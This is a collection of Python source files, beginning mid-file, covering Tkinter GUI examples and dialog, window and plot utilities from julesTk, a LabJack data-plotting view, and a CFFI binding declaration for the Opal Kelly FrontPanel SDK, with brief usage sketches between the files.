btc.pack(side=view.tk.RIGHT)
def exit(self):
self.application.stop()
class MainController(poller.Poller, controller.ViewController):
VIEW_CLASS = MainView
def __init__(self, parent):
super(MainController, self).__init__(parent=parent)
self._log = logging.getLogger()
        self._log.setLevel(logging.INFO)
self._count = 0
def _prepare(self):
return controller.ViewController._prepare(self)
def _start(self):
controller.ViewController._start(self)
        handler = logging.StreamHandler(self.view.get_widget("log"))
        handler.setLevel(logging.INFO)
        self._log.addHandler(handler)
self.run()
def execute(self):
self._log.info("Cycle {}".format(self._count))
self._count += 1
if __name__ == "__main__":
app = LogApp()
app.run()
```
#### File: examples/progress/progress.py
```python
from julesTk import app, controller, view
from julesTk.controller import poller
from julesTk.utils import progress
class ProgressApp(app.Application):
def __init__(self):
super(ProgressApp, self).__init__()
def _prepare(self):
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def _start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
self.root.resizable(False, False)
self.configure_grid(self)
btn = view.ttk.Button(self, text="Determinate", command=self.controller.progress_det)
self.add_widget("button1", btn)
self.configure_grid(btn, row=0, column=0)
btn = view.ttk.Button(self, text="Indeterminate", command=self.controller.progress_indet)
self.add_widget("button2", btn)
self.configure_grid(btn, row=0, column=1)
class MainController(controller.ViewController):
VIEW_CLASS = MainView
def __init__(self, parent, view=None):
super(MainController, self).__init__(parent=parent, view=view)
self._pb = None
def _prepare(self):
return controller.ViewController._prepare(self)
def _start(self):
controller.ViewController._start(self)
def progress_det(self):
self._pb = progress.ProgressBar(self.view, mode="determinate")
self._pb.view.title("Loading..")
self._pb.view.message = "Please wait.."
self._pb.view.geometry('300x100+200+200')
self._pb.start(self.long_process, block=True, auto_close=True)
def long_process(self):
import time
i = 0
while i < 100:
i += 5
self._pb.increase(5)
time.sleep(0.1)
return True
def progress_indet(self):
self._pb = progress.ProgressBar(self.view, mode="indeterminate", auto_close=False)
self._pb.view.message = "Please wait..."
self._pb.view.title("Operation in progress..")
self._pb.view.geometry('300x100+200+200')
self._pb.start(self.long_process)
if __name__ == "__main__":
app = ProgressApp()
app.run()
```
#### File: examples/question/question.py
```python
from julesTk import app, controller, view
from julesTk.utils.modals import QuestionBox
class QuestionApp(app.Application):
def __init__(self):
super(QuestionApp, self).__init__()
def _prepare(self):
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
# prevent resize
self.root.resizable(False, False)
# layout this frame
self.configure_grid(self)
btn = view.ttk.Button(self, text="Ask!", command=self.ask_question)
self.add_widget("button", btn)
self.configure_grid(btn, row=0, column=0, columnspan=2)
lbd = view.ttk.Label(self, text="Your said:")
self.add_widget("description", lbd)
self.configure_grid(lbd, row=1, column=0)
response = view.tk.StringVar(self)
self.add_variable("response", response)
lbr = view.ttk.Label(self, textvariable=response)
self.add_widget("response", lbr)
self.configure_grid(lbr, row=1, column=1)
def ask_question(self):
self.controller.ask_question()
@property
def response(self):
return self.get_variable("response").get()
@response.setter
def response(self, value):
self.get_variable("response").set(value)
class MainController(controller.ViewController):
VIEW_CLASS = MainView
def ask_question(self):
self.view.response = QuestionBox.ask(
self.view, "What is your name?"
)
if __name__ == "__main__":
app = QuestionApp()
app.run()
```
#### File: julesTk/model/__init__.py
```python
from julesTk import ThreadSafeObject
from julesTk.utils.observe import Observable
__author__ = "<NAME> <<EMAIL>>"
class Model(Observable, ThreadSafeObject):
def __init__(self):
super(Model, self).__init__()
self._data = None
@property
def data(self):
"""RAW Representation of the data contained in the model"""
with self.lock:
result = self._data
return result
def update(self):
"""Request the model to update it self"""
raise NotImplementedError
```
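A minimal sketch of a concrete `Model`, assuming `julesTk` is importable; `update()` mutates `_data` under the inherited lock, mirroring how the `data` property reads it:
```python
# Sketch only: the smallest useful Model subclass.
from julesTk.model import Model

class CounterModel(Model):
    """update() increments a counter under the ThreadSafeObject lock."""
    def update(self):
        with self.lock:
            self._data = (self._data or 0) + 1

model = CounterModel()
model.update()
print(model.data)  # -> 1, read back through the lock-protected property
```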
#### File: julesTk/utils/modals.py
```python
from julesTk import view, controller
from julesTk.view.window import Window
__author__ = "<NAME> <<EMAIL>>"
class ModalWindow(Window):
"""A window taking all focus and blocking interaction with other windows"""
STATE_BLOCKED = 4
def __init__(self, parent, ctrl):
super(ModalWindow, self).__init__(parent, ctrl)
self.application.register_hook("APP_CLOSE", self.hide)
def _prepare(self):
raise NotImplementedError
def _show(self):
super(ModalWindow, self)._show()
self.transient(self.parent)
self.grab_set()
self._block()
def block(self):
self._view_state = self.STATE_BLOCKED
return self._block()
def _block(self):
self.update()
self.root.wait_window(self)
def _hide(self):
return False
def _close(self):
self.application.remove_hook("APP_CLOSE", self.hide)
super(ModalWindow, self)._close()
def is_blocked(self):
return self._view_state == self.STATE_BLOCKED
class Dialog(ModalWindow):
"""Basic Dialog Window"""
def __init__(self, parent, ctrl):
super(Dialog, self).__init__(parent, ctrl)
self._response = None
# self._prepare()
@property
def response(self):
"""Returns the input of the user given in the ModalWindow
        Developers can use this to communicate the input of the window to the controller.
"""
return self._response
def _prepare(self):
self.grid()
self.configure_column(self, 0)
self.configure_row(self, [0, 1, 2])
# header
fmh = self.add_widget(
"header", view.ttk.Frame(self)
)
self.header(fmh)
self.configure_grid(fmh, row=0, column=0)
# body
fmb = self.add_widget(
"body", view.ttk.Frame(self)
)
self.body(fmb)
self.configure_grid(fmb, row=1, column=0)
# footer
fmf = self.add_widget(
"footer", view.ttk.Frame(self)
)
self.footer(fmf)
self.configure_grid(fmf, row=2, column=0)
def header(self, parent):
"""Header of the dialog"""
return True # override
def body(self, parent):
"""Build the body of the dialog, parent refers to parent frame"""
return True # override
def footer(self, parent):
"""Build the buttons of the dialog, parent refers to parent frame"""
return True # override
def validate(self):
return True # override
def start(self):
return self.show()
def stop(self):
return self.close()
class SimpleDialog(Dialog):
def __init__(self, parent, ctrl, buttons=None):
super(SimpleDialog, self).__init__(parent, ctrl)
        self._message = view.tk.StringVar(value="")  # keyword: the first positional arg is the master widget
if buttons is None:
buttons = []
if len(buttons) == 0:
buttons = [{"id": "ok", "caption": "Ok", "value": True}]
self._buttons = buttons
@property
def message(self):
return self._message.get()
@message.setter
def message(self, v):
self._message.set(v)
def body(self, parent):
lbm = view.ttk.Label(parent, textvariable=self._message)
lbm.pack(side=view.tk.TOP, fill=view.tk.BOTH, expand=1)
def footer(self, parent):
idx = 0
for button in self._buttons:
# get button id
name = button.get("id", None)
if name is None:
name = idx
idx += 1
# get caption
caption = button.get("caption", name)
# get return value
value = button.get("value", name)
# check if set to default
is_default = button.get("default", False)
if is_default:
self._response = value
# add button
btn = self.make_button(parent, name, caption, value, is_default)
btn.pack(side=view.tk.LEFT, padx=5)
def make_button(self, parent, name, caption, value, is_default=False):
"""Creates a button"""
default = view.tk.ACTIVE if is_default else view.tk.NORMAL
btn = view.ttk.Button(
parent, text=caption, default=default,
command=lambda i=value: self.process_click(i)
)
# register button in registry
self.add_widget(name, btn)
return btn
def process_click(self, value):
        pass  # override in subclasses (see MessageBox.process_click)
class MessageBox(SimpleDialog):
def __init__(self, parent, ctrl, buttons=None):
""" Initialize a MessageBox
:param parent: Reference to parent view
:type parent: julesTk.view.BaseView
:param ctrl: Reference to controller class
:type ctrl: julesTk.controller.BaseController
:param buttons: List of button definitions.
A button definition is dictionary with the keys: id, caption, value
:type buttons: list[dict[str, str | int | float]]
"""
super(MessageBox, self).__init__(parent, ctrl, buttons=buttons)
@classmethod
def alert(cls, parent, title, message, buttons=None):
"""Show an alert"""
if not isinstance(parent, (view.tk.Tk, view.tk.Frame, view.BaseView)):
raise ValueError("Expected a controller not a {}".format(type(parent)))
mb = cls(parent, None, buttons=buttons)
mb.title = title
mb.message = message
mb.show()
return mb.response
def process_click(self, value):
self._response = value
self.close()
class QuestionBox(Dialog):
def __init__(self, parent, ctrl):
super(QuestionBox, self).__init__(parent, ctrl)
self._question = view.tk.StringVar(self)
self._answer = view.tk.StringVar(self)
self._error = view.tk.StringVar(self)
@classmethod
def ask(cls, parent, question, default=None):
if not isinstance(parent, (view.tk.Tk, view.tk.Frame, view.BaseView)):
raise ValueError("Expected a view not a {}".format(type(parent)))
qb = cls(parent, None)
qb.question = question
qb._response = default
qb.answer = default
qb.show()
return qb.response
@property
def question(self):
return self._question.get()
@question.setter
def question(self, value):
self._question.set(value)
@property
def answer(self):
return self._answer.get()
@answer.setter
def answer(self, value):
value = "" if value is None else value
self._answer.set(value)
@property
def error(self):
        return self._error.get()
@error.setter
def error(self, text):
self._error.set(text)
def show_validation_msg(self):
lbv = self.get_widget("validate")
lbv.grid()
def hide_validation_msg(self):
lbv = self.get_widget("validate")
lbv.grid_remove()
def header(self, parent):
# add question
lbq = view.ttk.Label(parent, textvariable=self._question)
self.configure_grid(
lbq, padx=10, pady=5
)
def body(self, parent):
# add answer
ena = view.ttk.Entry(
parent, textvariable=self._answer
)
self.configure_grid(
ena, padx=15, pady=5
)
# add validation
view.ttk.Style().configure(
"Error.TLabel", foreground="red"
)
lbv = view.ttk.Label(
parent, textvariable=self._error, style="Error.TLabel"
)
self.add_widget("validate", lbv)
self.configure_grid(
lbv, row=1, padx=20
)
self.hide_validation_msg()
def footer(self, parent):
self.configure_column(parent, [0, 1])
# add cancel
view.ttk.Button(
parent, text="Cancel", command=self.cancel
).pack(side=view.tk.LEFT)
self.bind("<Escape>", lambda x: self.cancel())
# add ok
view.ttk.Button(
parent, text="Ok", command=self.ok
).pack(side=view.tk.LEFT)
self.bind("<Return>", lambda x: self.ok())
def validate(self):
response = self._answer.get()
result = response not in (None, "")
if not result:
self.error = "Please provide an answer"
self.show_validation_msg()
return result
def cancel(self):
self.close()
def ok(self):
if self.validate():
self._response = self._answer.get()
self.close()
```
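A hedged fragment showing `MessageBox.alert` driven from a `ViewController`, mirroring the `QuestionBox.ask` usage in the question example earlier; the dialogs resolve `application.register_hook` through the parent view, so they are meant to be opened from a running julesTk application:
```python
# Sketch only: confirmation dialog from inside a controller.
from julesTk import controller
from julesTk.utils.modals import MessageBox

class QuitController(controller.ViewController):
    def confirm_quit(self):
        answer = MessageBox.alert(
            self.view, "Quit", "Really quit?",
            buttons=[{"id": "yes", "caption": "Yes", "value": True},
                     {"id": "no", "caption": "No", "value": False, "default": True}])
        if answer:
            self.application.stop()
```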
#### File: julesTk/view/plot.py
```python
from julesTk.view import *
import matplotlib
matplotlib.use("TkAgg")
try:
    from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
except ImportError:  # matplotlib < 2.2 shipped the toolbar under its old name
    from matplotlib.backends.backend_tkagg import (
        FigureCanvasTkAgg, NavigationToolbar2TkAgg as NavigationToolbar2Tk)
from matplotlib.figure import Figure
class PlotFrame(Frame, object):
def __init__(self, parent):
super(PlotFrame, self).__init__(parent)
self._figure = None
self._canvas = None
self._toolbar = None
self._legend = None
self._axes = None
def _setup_figure(self, size, dpi=100):
        if not (isinstance(size, tuple) and len(size) == 2):
raise ValueError("Invalid value for size (need tuple of length 2)")
f = Figure(figsize=size, dpi=dpi)
self._figure = f
def _setup_canvas(self):
if not isinstance(self.figure, Figure):
raise ValueError("Invalid figure object")
self._canvas = FigureCanvasTkAgg(self.figure, self)
self._setup_toolbar()
        self.canvas.draw()  # FigureCanvasTkAgg.show() was removed in matplotlib 3
self._canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
def _setup_toolbar(self):
        self._toolbar = NavigationToolbar2Tk(self.canvas, self)
self.toolbar.update()
self.canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def _setup_subplot(self):
self._axes = self.figure.add_subplot(111)
@property
def figure(self):
"""Returns the current add_plot figure of this Frame
:rtype: matplotlib.figure.Figure
"""
return self._figure
@property
def canvas(self):
"""Returns the current canvas of this frame
:rtype: matplotlib.backends.backend_tkagg.FigureCanvasTkAgg
"""
return self._canvas
@property
def axes(self):
"""Returns the current subplot in the figure
:rtype: matplotlib.axes.Axes
"""
return self._axes
@property
def legend(self):
return self._legend
@property
def toolbar(self):
return self._toolbar
def setup(self, size=None, dpi=100):
if size is None:
size = (5, 5)
self._setup_figure(size, dpi)
self._setup_canvas()
self._setup_subplot()
def add_legend(self):
if self.axes is not None:
self._legend = self.axes.legend(loc='best')
def draw(self):
self.canvas.draw()
def clear(self):
self.figure.clear()
self._setup_subplot()
self.canvas.draw()
class PlotView(View):
""" A view with a plot embedded.
"""
def __init__(self, parent, controller):
super(PlotView, self).__init__(parent, controller)
self._plot = None
@property
def plot(self):
""" Returns the plot frame embedded in this frame
:rtype: julesTk.view.plot.PlotFrame
"""
return self._plot
def body(self):
self.configure_grid(self)
self.setup_plot()
def setup_plot(self):
self._plot = PlotFrame(self)
self.plot.setup()
```
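A minimal sketch embedding `PlotFrame` in a bare Tk window, assuming julesTk and matplotlib are installed; `setup()` builds the figure, canvas, toolbar, and a single 111 subplot:
```python
# Sketch only: stand-alone PlotFrame demo.
import tkinter as tk
from julesTk.view.plot import PlotFrame

root = tk.Tk()
frame = PlotFrame(root)
frame.setup(size=(5, 3), dpi=100)
frame.pack(fill=tk.BOTH, expand=True)

frame.axes.plot([0, 1, 2, 3], [0, 1, 4, 9], label="y = x^2")
frame.add_legend()   # places a legend at the 'best' location
frame.draw()
root.mainloop()
```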
#### File: julesTk/view/window.py
```python
from julesTk.view import tk, BaseView
from julesTk.view.viewset import BaseViewSet
__author__ = "<NAME> <<EMAIL>>"
class Window(tk.Toplevel, BaseView):
def __init__(self, parent, controller):
tk.Toplevel.__init__(self, parent)
BaseView.__init__(self, parent, controller)
self.protocol("WM_DELETE_WINDOW", self.exit)
@property
def root(self):
"""Return the root view
:rtype: Tkinter.Tk or tkinter.Tk
"""
result = self.parent
if self.controller is not None:
result = self.controller.root
elif isinstance(result, BaseView):
result = self.parent.root
return result
@property
def application(self):
result = self.parent
if self.controller is not None:
result = self.controller.application
elif isinstance(result, BaseView):
result = self.parent.application
return result
def _prepare(self):
raise NotImplementedError
def _show(self):
self.deiconify()
def _hide(self):
self.withdraw()
return True
def _close(self):
if self.controller is not None and not self.controller.is_stopped():
self.controller.stop()
self.destroy()
return True
def exit(self):
self.close()
class WindowViewSet(Window, BaseViewSet):
"""A window that can contain multiple views"""
def _prepare(self):
raise NotImplementedError
def _close(self):
BaseViewSet.close_views(self)
return super(WindowViewSet, self)._close()
``` |
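A hedged sketch of a concrete `Window`: `_prepare()` is the abstract hook each subclass fills in, and `exit()` (wired to `WM_DELETE_WINDOW` above) closes it; the parent and controller would come from a running julesTk application:
```python
# Sketch only: the smallest concrete Window.
from julesTk import view
from julesTk.view.window import Window

class AboutWindow(Window):
    def _prepare(self):
        self.title("About")
        lbl = view.ttk.Label(self, text="julesTk demo window")
        lbl.pack(padx=20, pady=20)
        btn = view.ttk.Button(self, text="Close", command=self.exit)
        btn.pack(pady=(0, 10))
```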
{
"source": "jjongbloets/pyLabJackView",
"score": 2
} |
#### File: pyLabJackView/view/labjack.py
```python
from julesTk.view import *
from julesTk.view.plot import PlotFrame
import numpy as np
from datetime import datetime as dt
__author__ = "<NAME> <<EMAIL>>"
class LabJackPlotFrame(PlotFrame):
"""Frame capable of plotting labjack data"""
def __init__(self, parent):
super(LabJackPlotFrame, self).__init__(parent)
self._t_zero = None
self._lines = {}
@property
def t_zero(self):
""" Returns the time zero of the plot
:rtype: datetime.datetime
"""
if self._t_zero is None:
self._t_zero = dt.now()
return self._t_zero
def t_since(self, t_point=None):
t_zero = self.t_zero
if t_point is None:
t_point = dt.now()
return (t_point - t_zero).total_seconds()
def clear(self):
self._lines = {}
super(LabJackPlotFrame, self).clear()
self._t_zero = None
def update_line(self, ain, x, y):
if not isinstance(x, (tuple, list)):
x = x,
if not isinstance(y, (tuple, list)):
y = y,
        x_new = []
        for v in x:
            # convert datetimes to seconds since t_zero; keep plain numbers as-is
            x_new.append(self.t_since(v) if isinstance(v, dt) else v)
        x = x_new
        del x_new
if ain in self._lines.keys():
line = self._lines[ain]
xlim, ylim = self.add_line_point(line, x, y)
else:
xlim, ylim = self.add_line(ain, x, y)
return xlim, ylim
def add_line(self, ain, x, y):
"""Adds a new line to the plot"""
l = self.axes.plot(x, y, label="AIN {}".format(ain))[0]
self._lines[ain] = l
return self.axes.get_xlim(), self.axes.get_ylim()
def add_line_point(self, line, x, y):
"""Adds a new point to an existing line"""
xdata = np.append(line.get_xdata(), x)
line.set_xdata(xdata)
ydata = np.append(line.get_ydata(), y)
line.set_ydata(ydata)
return (xdata.min(), xdata.max()), (ydata.min(), ydata.max())
class LabJackView(View):
GAIN_INDEXES = {
"x1": 0,
"x10": 1,
"x100": 2,
"x1000": 3,
"auto": 15,
}
REFRESH_RATES = {
# "50 msec": 0.05,
# "100 msec": 0.1,
# "200 msec": 0.2,
"500 msec": 0.5,
"1 sec": 1,
"2 sec": 2,
"5 sec": 5,
"10 sec": 10,
"15 sec": 15,
"30 sec": 30,
"1 min": 60,
# "5 min": 300,
# "10 min": 600,
# "30 min": 1800,
# "1 hour": 3600,
} # in seconds per update
def __init__(self, parent, controller):
super(LabJackView, self).__init__(parent, controller)
@property
def controller(self):
""" Returns the
:return:
:rtype: pyLabJackView.controller.labjack.LabJackController
"""
return self._controller
@property
def plot(self):
"""Returns the add_plot object loaded in this view
:rtype: pyLabJackView.view.labjack.LabJackPlotFrame
"""
return self.get_widget("add_plot")
@property
def refresh_rate(self):
v = self.variables["refresh_rate"].get()
return self.REFRESH_RATES.get(v, 1)
@property
def resolution(self):
v = self.variables["resolution"].get()
return int(v)
@property
def gain(self):
v = self.variables["gain"].get()
return self.GAIN_INDEXES.get(v, 1)
    def set_status_text(self, text):
        self.variables["status"].set(text)
def _prepare(self):
self.configure_grid(self)
# add widgets
lbj_ports_frame = ttk.Frame(self)
self.configure_grid(lbj_ports_frame, row=0, column=0)
self.setup_labjack_ports(parent=lbj_ports_frame)
lbj_msr_frame = ttk.Frame(self)
self.configure_grid(lbj_msr_frame, row=1, column=0)
self.setup_labjack_settings(parent=lbj_msr_frame)
ctrl_frame = ttk.Frame(self)
self.configure_grid(ctrl_frame, row=2, column=0)
self.setup_control(parent=ctrl_frame)
plt_frame = ttk.Frame(self)
self.configure_grid(plt_frame, row=3, column=0)
self.setup_plot(parent=plt_frame)
# set min size
min_colsize = self.plot.figure.get_figwidth() * self.plot.figure.dpi
min_rowsize = self.plot.figure.get_figheight() * self.plot.figure.dpi
self.grid_columnconfigure(0, weight=1, minsize=min_colsize)
self.grid_rowconfigure(3, weight=1, minsize=min_rowsize)
def setup_labjack_settings(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
# resolution
        lbl = ttk.Label(parent, text="Resolution:")
        v = self.add_variable("resolution", tk.StringVar())
        cob = self.add_widget("resolution", ttk.Combobox(
            parent, state="readonly", textvariable=v
        ))
        cob["values"] = list(range(13))
cob.current(12)
cob.bind("<<ComboboxSelected>>", self.update_resolution)
cob.grid(row=0, column=0)
# gain
v = self.add_variable("gain", tk.StringVar())
cob = self.add_widget("gain", ttk.Combobox(
parent, state="readonly", textvariable=v
))
gains = sorted(self.GAIN_INDEXES, key=self.GAIN_INDEXES.get)
cob["values"] = gains
cob.current(gains.index("x100"))
cob.bind("<<ComboboxSelected>>", self.update_gain)
cob.grid(row=0, column=1)
def setup_labjack_ports(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
# add ains
ain_frm = ttk.Frame(parent)
self.configure_grid(ain_frm, row=0, column=0)
lbl = ttk.Label(ain_frm, text="Analog Inputs")
self.configure_grid(lbl, sticky="n", row=0, column=0)
for ain in range(14):
row = ain % 5
column = ain // 5
w = self.new_ain_widget(ain, parent=ain_frm)
self.configure_grid(w, sticky="w", row=row+1, column=column)
self.configure_column(ain_frm, [0, 1, 2])
# add mios
dio_frm = ttk.Frame(parent)
self.configure_grid(dio_frm, row=0, column=1)
self.configure_column(dio_frm, [0, 1, 2])
lbl = ttk.Label(dio_frm, text="Digital I/O")
self.configure_grid(lbl, sticky="nw", row=0, column=0)
for dio in range(20):
row = dio % 5
column = dio // 5
w = self.new_dio_widget(dio, parent=dio_frm)
self.configure_grid(w, sticky="w", row=row+1, column=column)
def new_ain_widget(self, ain, parent=None):
if parent is None:
parent = self
name = "ain_%s" % ain
v = self.add_variable(name, tk.IntVar())
cb = ttk.Checkbutton(
parent, text=name.upper(), command=lambda: self.toggle_ain(ain),
variable=v
)
return self.add_widget(name, cb)
def new_dio_widget(self, dio, parent=None):
if parent is None:
parent = self
name = "dio_%s" % dio
v = self.add_variable(name, tk.IntVar())
cb = ttk.Checkbutton(
parent, text=name.upper(), command=lambda: self.toggle_dio(dio),
variable=v
)
return self.add_widget(name, cb)
def setup_plot(self, parent=None):
if parent is None:
parent = self
self.add_widget("add_plot", LabJackPlotFrame(parent))
self.plot.setup()
self.configure_grid(self.plot, row=3, column=0, columnspan=2)
self.plot.grid_columnconfigure(0, weight=1)
self.plot.grid_rowconfigure(0, weight=1)
parent.grid_columnconfigure(0, weight=1)
parent.grid_rowconfigure(0, weight=1)
def setup_control(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
parent.grid_columnconfigure(2, weight=1)
self.widgets["start"] = ttk.Button(
parent, text="Record", command=self.start_update,
state="normal"
)
self.widgets["start"].grid(row=0, column=0)
self.widgets["pause"] = ttk.Button(
parent, text="Pause", command=self.pause_update,
state="disabled"
)
self.widgets["pause"].grid(row=0, column=1)
self.widgets["reset"] = ttk.Button(
parent, text="Reset", command=self.reset_plot,
state="normal"
)
self.widgets["reset"].grid(row=0, column=2)
v = self.add_variable("status", tk.StringVar())
status = ttk.Label(
parent, textvariable=v,
)
status.grid(row=1, column=0, columnspan=3)
# refresh rate
self.setup_rate(parent)
def setup_rate(self, parent=None):
if parent is None:
parent = self
label = ttk.Label(parent, text="Refresh rate:")
label.grid(row=2, column=0)
v = self.add_variable("refresh_rate", tk.StringVar())
cob = ttk.Combobox(
parent, state="readonly", textvariable=v
)
self.add_widget("refresh_rate", cob)
rates = sorted(self.REFRESH_RATES, key=self.REFRESH_RATES.get)
cob["values"] = rates
cob.current(rates.index("1 sec"))
cob.bind("<<ComboboxSelected>>", self.update_rate)
cob.grid(row=2, column=1)
def reset_plot(self):
self.controller.reset_plot()
def start_update(self):
if self.controller.start_update():
self.get_widget("start")["state"] = "disabled"
self.get_widget("pause")["state"] = "normal"
def pause_update(self):
if self.controller.stop_update():
self.get_widget("pause")["state"] = "disabled"
self.get_widget("start")["state"] = "normal"
def update_rate(self, event):
self.controller.update_interval = self.refresh_rate
def update_resolution(self, event):
self.controller.update_resolution(self.resolution)
def update_gain(self, event):
self.controller.update_gain(self.gain)
def toggle_ain(self, ain):
name = "ain_%s" % ain
v = self.get_variable(name)
self.controller.toggle_ain(ain, v.get())
def toggle_dio(self, dio):
name = "dio_%s" % dio
v = self.get_variable(name)
self.controller.toggle_dio(dio, v.get())
``` |
{
"source": "jjongbloets/pyOKFrontPanel",
"score": 2
} |
#### File: pyOKFrontPanel/okfrontpanel/wrapper_build.py
```python
import sys
import os
import struct
extra_dirs = {}
include_dirs = []
library_dirs = []
bits = struct.calcsize("P") * 8
if sys.platform == 'win32':
arch = 'x64' if bits == 64 else 'Win32'
okpath = os.environ['OKFP_SDK']
include_dirs.append(os.path.join(okpath, 'include'))
library_dirs.append(os.path.join(okpath, 'lib', arch))
extra_dirs.update({
'include_dirs': include_dirs,
'library_dirs': library_dirs
})
#
# CFFI
#
import cffi
ffibuilder = cffi.FFI()
ffibuilder.set_source(
"okfrontpanel._wrapper",
"""
#include <stdint.h>
#include <okFrontPanelDLL.h>
""",
libraries=['okFrontPanel'],
**extra_dirs
)
ffibuilder.cdef("""
#define TRUE ...
#define FALSE ...
#define OK_MAX_DEVICEID_LENGTH ... // 32-byte content + NULL termination
#define OK_MAX_SERIALNUMBER_LENGTH ... // 10-byte content + NULL termination
#define OK_MAX_PRODUCT_NAME_LENGTH ... // 127-byte content + NULL termination
#define OK_MAX_BOARD_MODEL_STRING_LENGTH ...
// ok_USBSpeed types
#define OK_USBSPEED_UNKNOWN ...
#define OK_USBSPEED_FULL ...
#define OK_USBSPEED_HIGH ...
#define OK_USBSPEED_SUPER ...
// ok_Interface types
#define OK_INTERFACE_UNKNOWN ...
#define OK_INTERFACE_USB2 ...
#define OK_INTERFACE_PCIE ...
#define OK_INTERFACE_USB3 ...
#define OK_PRODUCT_OEM_START ...
typedef int Bool;
typedef char okBool;
typedef char const * okFP_dll_pchar;
typedef enum {
ok_FPGAConfigurationMethod_NVRAM = 0,
ok_FPGAConfigurationMethod_JTAG = 1
} ok_FPGAConfigurationMethod;
typedef enum {
ok_ClkSrc22150_Ref = 0,
ok_ClkSrc22150_Div1ByN = 1,
ok_ClkSrc22150_Div1By2 = 2,
ok_ClkSrc22150_Div1By3 = 3,
ok_ClkSrc22150_Div2ByN = 4,
ok_ClkSrc22150_Div2By2 = 5,
ok_ClkSrc22150_Div2By4 = 6
} ok_ClockSource_22150;
typedef enum {
ok_ClkSrc22393_Ref = 0,
ok_ClkSrc22393_PLL0_0 = 2,
ok_ClkSrc22393_PLL0_180 = 3,
ok_ClkSrc22393_PLL1_0 = 4,
ok_ClkSrc22393_PLL1_180 = 5,
ok_ClkSrc22393_PLL2_0 = 6,
ok_ClkSrc22393_PLL2_180 = 7
} ok_ClockSource_22393;
typedef enum {
ok_DivSrc_Ref = 0,
ok_DivSrc_VCO = 1
} ok_DividerSource;
typedef enum {
ok_brdUnknown = 0,
ok_brdXEM3001v1 = 1,
ok_brdXEM3001v2 = 2,
ok_brdXEM3010 = 3,
ok_brdXEM3005 = 4,
ok_brdXEM3001CL = 5,
ok_brdXEM3020 = 6,
ok_brdXEM3050 = 7,
ok_brdXEM9002 = 8,
ok_brdXEM3001RB = 9,
ok_brdXEM5010 = 10,
ok_brdXEM6110LX45 = 11,
ok_brdXEM6110LX150 = 15,
ok_brdXEM6001 = 12,
ok_brdXEM6010LX45 = 13,
ok_brdXEM6010LX150 = 14,
ok_brdXEM6006LX9 = 16,
ok_brdXEM6006LX16 = 17,
ok_brdXEM6006LX25 = 18,
ok_brdXEM5010LX110 = 19,
ok_brdZEM4310 = 20,
ok_brdXEM6310LX45 = 21,
ok_brdXEM6310LX150 = 22,
ok_brdXEM6110v2LX45 = 23,
ok_brdXEM6110v2LX150 = 24,
ok_brdXEM6002LX9 = 25,
ok_brdXEM6310MTLX45T = 26,
ok_brdXEM6320LX130T = 27,
ok_brdXEM7350K70T = 28,
ok_brdXEM7350K160T = 29,
ok_brdXEM7350K410T = 30,
ok_brdXEM6310MTLX150T = 31,
ok_brdZEM5305A2 = 32,
ok_brdZEM5305A7 = 33,
ok_brdXEM7001A15 = 34,
ok_brdXEM7001A35 = 35,
ok_brdXEM7360K160T = 36,
ok_brdXEM7360K410T = 37,
ok_brdZEM5310A4 = 38,
ok_brdZEM5310A7 = 39,
ok_brdZEM5370A5 = 40,
ok_brdXEM7010A50 = 41,
ok_brdXEM7010A200 = 42,
ok_brdXEM7310A75 = 43,
ok_brdXEM7310A200 = 44
} ok_BoardModel;
// Errors
typedef enum {
ok_NoError = 0,
ok_Failed = -1,
ok_Timeout = -2,
ok_DoneNotHigh = -3,
ok_TransferError = -4,
ok_CommunicationError = -5,
ok_InvalidBitstream = -6,
ok_FileError = -7,
ok_DeviceNotOpen = -8,
ok_InvalidEndpoint = -9,
ok_InvalidBlockSize = -10,
ok_I2CRestrictedAddress = -11,
ok_I2CBitError = -12,
ok_I2CNack = -13,
ok_I2CUnknownStatus = -14,
ok_UnsupportedFeature = -15,
ok_FIFOUnderflow = -16,
ok_FIFOOverflow = -17,
ok_DataAlignmentError = -18,
ok_InvalidResetProfile = -19,
ok_InvalidParameter = -20
} ok_ErrorCode;
typedef struct {...;} okTRegisterEntry;
typedef struct {...;} okTTriggerEntry;
typedef struct {...;} okTFPGAResetProfile;
typedef struct {...;} okTFlashLayout;
typedef struct {...;} okTDeviceInfo;
typedef struct {...;} okTDeviceMatchInfo;
typedef struct {...;} okTDeviceSensor;
typedef void* okPLL22150_HANDLE;
typedef void* okPLL22393_HANDLE;
typedef void* okFrontPanel_HANDLE;
typedef struct okDeviceSensorsHandle* okDeviceSensors_HANDLE;
typedef struct okDeviceSettingsHandle* okDeviceSettings_HANDLE;
typedef struct okFirmwareHandle* okFirmware_HANDLE;
typedef struct okFirmwarePackageHandle* okFirmwarePackage_HANDLE;
typedef struct okFrontPanelManagerHandle* okFrontPanelManager_HANDLE;
typedef struct okCFrontPanelManagerHandle* okCFrontPanelManager_HANDLE;
typedef struct okCFrontPanelDevicesHandle* okCFrontPanelDevices_HANDLE;
typedef void (*okFirmware_PerformTasks_Callback)(void*, int, const char*);
// General
//
void okFrontPanelDLL_GetVersion(char *date, char *time);
// okPLL22393
//
okPLL22393_HANDLE okPLL22393_Construct();
void okPLL22393_Destruct(okPLL22393_HANDLE pll);
void okPLL22393_SetCrystalLoad(okPLL22393_HANDLE pll, double capload);
void okPLL22393_SetReference(okPLL22393_HANDLE pll, double freq);
double okPLL22393_GetReference(okPLL22393_HANDLE pll);
Bool okPLL22393_SetPLLParameters(okPLL22393_HANDLE pll, int n, int p, int q, Bool enable);
Bool okPLL22393_SetPLLLF(okPLL22393_HANDLE pll, int n, int lf);
Bool okPLL22393_SetOutputDivider(okPLL22393_HANDLE pll, int n, int div);
Bool okPLL22393_SetOutputSource(okPLL22393_HANDLE pll, int n, ok_ClockSource_22393 clksrc);
